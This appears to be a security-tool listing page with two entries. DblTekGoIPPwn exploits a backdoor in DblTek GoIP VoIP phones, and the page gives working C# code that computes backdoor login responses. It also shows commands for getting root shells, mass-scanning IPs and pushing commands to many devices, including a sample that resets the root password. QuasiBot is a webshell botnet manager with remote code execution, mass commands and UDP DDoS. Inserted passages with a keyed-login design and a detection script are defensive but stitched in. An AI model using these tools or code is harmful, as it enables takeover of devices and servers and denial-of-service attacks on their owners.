
DblTekGoIPPwn - Tool to check if an IP of a DblTek GoIP is vulnerable to a challenge-response login system, execute remote commands botnet style, and generate responses to challenges


Tool to exploit challenge response system in vulnerable DblTek GoIP devices. Can generate responses to specified challenges, test hosts for the vulnerability, run commands on vulnerable hosts, and drop into a root shell on any vulnerable host.

The Vulnerability
On March 2nd, 2017, Trustwave published a vulnerability that its security researchers found in the DblTek GoIP VoIP phone. The vulnerability was a backdoor in the firmware for an account named 'dbladm'. When a user entered this as the username at the telnet prompt, the system presented a challenge; when the right response followed, the user was given a root shell on the system.
The problem with such a challenge-response system is that the devices are only as secure as the algorithm for generating the responses, which was reverse engineered from firmware binaries provided by DblTek. Because the algorithm depends on nothing but the challenge itself (no per-device secret), anyone who knows it can compute the response, and a root shell can be acquired on ANY DblTek GoIP device.
Original Article: https://www.trustwave.com/Resources/SpiderLabs-Blog/Undocumented-Backdoor-Account-in-DBLTek-GoIP/
Using the description of the backdoor provided in the article, I was able to write what I believe to be some of the first exploit code for this vulnerability. The core of this is of course the algorithm to generate the response based on a given challenge. Here is a function to do this written in C#.
using System;
using System.Security.Cryptography;
using System.Text;

static string ComputeResponse(string challengeStr)
{
    int challenge = Convert.ToInt32(challengeStr.Substring(1)); // Get just the number after 'N'.

    string modified = (challenge + 20139 + (challenge >> 3)).ToString(); // Perform some dummy 1337 operations.

    byte[] buffer = new byte[64]; // Zero-filled; the whole 64 bytes are hashed, not just the digits.
    // Copy the string into the first part of the buffer.
    for (int i = 0; i < modified.Length; i++)
        buffer[i] = (byte)modified[i];

    var md5 = MD5.Create();
    byte[] hash = md5.ComputeHash(buffer); // Calculate the MD5 of the buffer.

    StringBuilder sb = new StringBuilder(); // Will hold the results.
    // Take the unpadded hex value of the first six bytes of the MD5 ("x", not "x2", so 0x0a becomes "a").
    for (int i = 0; i < 6; i++)
        sb.Append(hash[i].ToString("x"));

    return sb.ToString(); // Profit
}
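The weakness described above is that the response is a pure function of the challenge, so knowing the algorithm is equivalent to owning every device. The following added example (written for this page, not code from DblTek, Trustwave or the DblTekGoIPPwn project) shows the design a device vendor should have used instead: the response is an HMAC over the challenge under a per-device key, and the server only accepts responses to challenges it actually issued, once. The key value, the challenge shape and the class name are assumptions made for the demonstration.

```python
import hashlib
import hmac
import secrets

# Constructed per-device secret for this demonstration. A real device would get a
# unique key provisioned at manufacture, never a constant shared across the product line.
DEVICE_KEY = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0")


def keyed_response(challenge: str, key: bytes) -> str:
    """Response that depends on the challenge AND a per-device key (HMAC-SHA256)."""
    return hmac.new(key, challenge.encode(), hashlib.sha256).hexdigest()


def algorithm_only_response(challenge: str) -> str:
    """What someone who knows the algorithm but holds no key can compute from the
    challenge alone. Against a key-less scheme (like the GoIP one) this is all that
    is needed; against the keyed scheme below it never verifies."""
    return hashlib.sha256(challenge.encode()).hexdigest()


class ChallengeResponseLogin:
    """Server (device) side of a keyed challenge-response login with replay protection."""

    def __init__(self, key: bytes):
        self._key = key
        self._outstanding = set()  # challenges issued but not yet answered

    def issue_challenge(self) -> str:
        # Same 'N<number>' shape as the challenges quoted on this page, but random,
        # so a captured response cannot be reused for a later login.
        challenge = "N" + str(secrets.randbelow(2 ** 31))
        self._outstanding.add(challenge)
        return challenge

    def verify(self, challenge: str, response: str) -> bool:
        # Reject challenges we never issued or already consumed: replay defence.
        if challenge not in self._outstanding:
            return False
        self._outstanding.discard(challenge)  # one-shot: consumed on any attempt
        expected = keyed_response(challenge, self._key)
        # Constant-time comparison so timing does not leak how many bytes matched.
        return hmac.compare_digest(expected, response)


if __name__ == "__main__":
    device = ChallengeResponseLogin(DEVICE_KEY)
    c = device.issue_challenge()
    print("challenge:", c)
    print("keyed response accepted:", device.verify(c, keyed_response(c, DEVICE_KEY)))
    c = device.issue_challenge()
    print("algorithm-only response accepted:", device.verify(c, algorithm_only_response(c)))
```

The point of the example is the contrast with the C# function on this page: there, `ComputeResponse` needs only the challenge string, so publishing (or reverse engineering) the firmware ends the security of every unit. Here, a leaked firmware image gives the algorithm but not `DEVICE_KEY`, and each challenge is accepted at most once.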

DblTekGoIPPwn Command Line Interface (CLI)
When DblTekPwn is run without arguments, the help is displayed. This is the output:
USAGE: DblTekPwn.exe [MODE] [HOSTS] [OUTPUT]

[MODE]:
-c --compute-response [CHALLENGE] Computes a response to the given challenge.
-r --root-shell Starts a root shell with the vulnerable host.
-s --send-commands [COMMAND_FILE] Sends commands from a file to vulnerable hosts.
-t --test Tests hosts and determines if they are vulnerable.
-h --help Displays this help and exits.

[HOSTS]:
-n --name [IP] Specifies a single IP address.
-f --file [IP_FILE] Specifies a file with IP\nIP\nIP.

[OUTPUT]:
-o --output [OUTPUT_FILE] Specifies an output file. Default stdin.

Examples

Getting a Root Shell on a Vulnerable System
DblTekGoIPPwn makes it easy to get a root shell on any vulnerable system. Simply run the following command using the vulnerable IP.
DblTekPwn.exe --root-shell --name 192.168.1.1
You will see output that looks like this:
Password: ***********
From here you can begin entering commands (there is no shell prompt).

Calculating a Challenge Response
Say you wanted to calculate the response to a GoIP challenge N1746203308. You would just run the following command.
DblTekPwn --compute-response N1746203308
The output will be the response:
d6176d3aab2
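For a defender, the observable signature of this backdoor on the wire is the sequence the sections above describe: a telnet login with the user name dbladm, the device answering with an N-prefixed numeric challenge, and then the Password: prompt where the response is typed. The following added example (not part of the original post or the DblTekGoIPPwn tool) runs that check over reassembled telnet session transcripts, as a network sensor or honeypot might record them. The transcripts, the exact "login:" prompt wording and the host addresses are constructed for the example.

```python
import re

# Observable markers taken from the published description of the backdoor.
BACKDOOR_USER = "dbladm"
LOGIN_RE = re.compile(r"login:\s*(\S+)", re.IGNORECASE)   # prompt wording is an assumption
CHALLENGE_RE = re.compile(r"N\d+")                         # 'N1746203308' style challenge

# Constructed sample transcripts: server and client lines interleaved in order.
SUSPICIOUS_SESSION = """login: dbladm
N1746203308
Password: ***********
"""
BENIGN_SESSION = """login: admin
Password: ***********
Login incorrect
"""


def find_backdoor_login(transcript: str):
    """Return a finding dict if the transcript shows a login to the backdoor
    account, with the challenge if the device emitted one, else None."""
    lines = [ln.strip() for ln in transcript.splitlines()]
    for i, line in enumerate(lines):
        m = LOGIN_RE.search(line)
        if not m or m.group(1).lower() != BACKDOOR_USER:
            continue
        # The challenge is printed by the device within the next few lines.
        for follow in lines[i + 1:i + 4]:
            cm = CHALLENGE_RE.fullmatch(follow)
            if cm:
                return {"user": BACKDOOR_USER, "challenge": cm.group(0), "line": i + 1}
        # Backdoor user name seen even if no challenge followed: still worth an alert.
        return {"user": BACKDOOR_USER, "challenge": None, "line": i + 1}
    return None


def scan_sessions(sessions):
    """sessions: mapping of 'client->device' label to transcript text.
    Returns a sorted list of (label, finding) for every session that matched."""
    alerts = []
    for label, transcript in sessions.items():
        finding = find_backdoor_login(transcript)
        if finding is not None:
            alerts.append((label, finding))
    return sorted(alerts)


if __name__ == "__main__":
    sample = {
        "10.0.0.5->192.168.1.1": SUSPICIOUS_SESSION,
        "10.0.0.5->192.168.1.3": BENIGN_SESSION,
    }
    for label, finding in scan_sessions(sample):
        print("ALERT", label, finding)
```

Any hit on dbladm is worth alerting on regardless of whether the challenge follows, since that account name has no legitimate use; the challenge capture is there so the alert can show that the exchange actually progressed past the user name.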

Checking a List of IPs
Say you wished to check list.txt of IPs for GoIPs that are vulnerable and send this output to results.txt. First make sure that the IPs are in the format ip:port (the port defaults to 23) and that the IPs are separated by a newline \n. The following command could then be run.
DblTekPwn.exe --test --file list.txt --output results.txt
list.txt:
192.168.1.0
192.168.1.1
192.168.1.2:1337
192.168.1.3
192.168.1.4:2323
results.txt:
192.168.1.0 False
192.168.1.1 True
192.168.1.2:1337 True
192.168.1.3 False
192.168.1.4:2323 False
The False or True after the host indicates whether or not the IP is vulnerable.

Sending Commands to a List of IPs
Say you had a list of commands (which is really a list of telnet inputs) in cmds.txt to send to list.txt of IPs and send the output to results.txt. First make sure that the IPs are in the format ip:port (the port defaults to 23) and that BOTH the IPs AND the commands are separated by a newline \n in their respective files. The following command could then be run.
DblTekPwn.exe --send-commands cmds.txt --file list.txt --output results.txt
list.txt:
192.168.1.0
192.168.1.1
192.168.1.2:1337
192.168.1.3
192.168.1.4:2323
cmds.txt:
passwd root
toor
toor

exit
results.txt:
192.168.1.0 False
192.168.1.1 True
192.168.1.2:1337 True
192.168.1.3 False
192.168.1.4:2323 False
The False or True after the host indicates whether or not the connection was successfully made and the commands delivered.


QuasiBot - Webshell Manager aka HTTP Botnet


QuasiBot is a complex webshell manager written in PHP, which operates on web-based backdoors implemented by the user. Using the prepared PHP backdoors, quasiBot works as a C&C, trying to communicate with each backdoor. The tool goes beyond average web-shell managers, since it delivers useful functions for scanning, exploiting and so on. It is a quasi-HTTP botnet, hence the name.

All data about bots is stored in an SQL database; at the moment only MySQL is supported. A TOR proxy is also supported; the goal was to create a secure connection between the C&C and the backdoors, and using SOCKS5 it is able to torify all connections between you and the web server. All configuration is stored in the config file. QuasiBot is still under construction, so I am aware there may be bugs.

You will need any web server software; tested on Linux, Apache 2.2 and PHP 5.4.4.

How it works

  • quasiBot operates on web shells supplied by the user; each backdoor is verified by an MD5 hash that changes every hour
    quasiBot (C&C) -[request/verification]-> Bots (Webshells) -[response/verification]-> quasiBot (C&C) -[request/command]-> Bots (Webshells) -[response/execution]-> quasiBot (C&C)
  • Backdoors come in two types, with and without the DDoS module; the source code is included and displayed on the home page
  • The connection between the C&C and the server is handled by curl; a TOR proxy is supported, and the User-Agent is randomized from an array
    quasiBot (C&C) -[PROXY/TOR]-> Bots (Webshells) <-[PROXY/TOR]- quasiBot (C&C)
  • Webshells can be removed and added in the 'Settings' tab; they are stored in the database
  • The 'RSS' tab contains the latest exploit and vulnerability feeds
  • The 'RCE' tab performs Remote Code Execution on a specific server using the selected PHP function
  • The 'Scan' tab resolves an IP or URL and performs a basic scan using nmap, dig and whois, useful in the information-gathering phase
  • The 'Pwn' tab groups a few functions that collect information about the server and try to find exploits for the OS version in use, using Linux Exploit Suggester
  • 'MySQL Manager', as the name says, performs basic operations on a specific database; it can help when looking for config files that include MySQL connections on the remote server, and it also displays some information about its environment
  • The 'Run' tab runs a specific command on every bot at once
  • The 'DDoS' tab performs UDP DoS attacks using all bots or a single one; the expanded backdoor is required
  • The whole front-end is maintained in a pleasant, functional interface

Running quasi for first time

  • Move all files to the prepared directory and change the default settings in the config file (config.php)
  • Visiting quasiBot for the first time creates the needed database and its structure
  • In the 'Settings' tab you can add and delete shells; then you're ready to go

Todo

  • Authorization system
  • Move Linux Exploit Suggester to PHP
  • Add Windows support to 'PWN' module
  • Automatic attacks on servers
  • Backdoor creation (backconnects)
  • Source code cleanup, it's still pretty shitty; amount of required files should be reduced
  • ???